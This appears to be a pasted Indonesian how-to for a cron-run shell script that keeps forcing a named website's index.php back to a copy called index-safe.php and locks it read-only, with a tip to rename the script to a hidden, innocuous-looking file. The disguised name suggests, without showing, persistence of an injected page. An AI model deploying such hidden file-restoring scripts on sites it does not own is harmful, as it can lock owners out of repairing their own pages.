

buat file dengan nama protect.sh
kalau mau ganti nama dari terminal contoh : 
mv protect.sh .cache_sync

===========================================================================================
 
#!/bin/sh

FILE="/home/u200768895/domains/aceprofessionalpainting.ca/public_html/index.php"
SAFE="/home/u200768895/domains/aceprofessionalpainting.ca/public_html/index-safe.php"

if [ ! -f "$FILE" ]; then
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
    exit
fi

if ! cmp -s "$FILE" "$SAFE"; then
    chmod 644 "$FILE"
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
fi

===========================================================================================


setelah save file jalankan di terminal
chmod +x protect.sh


kalau sudah berhasil pasang chron job
terminal ketik
/home/u200768895/domains/aceprofessionalpainting.ca/public_html/protect.sh
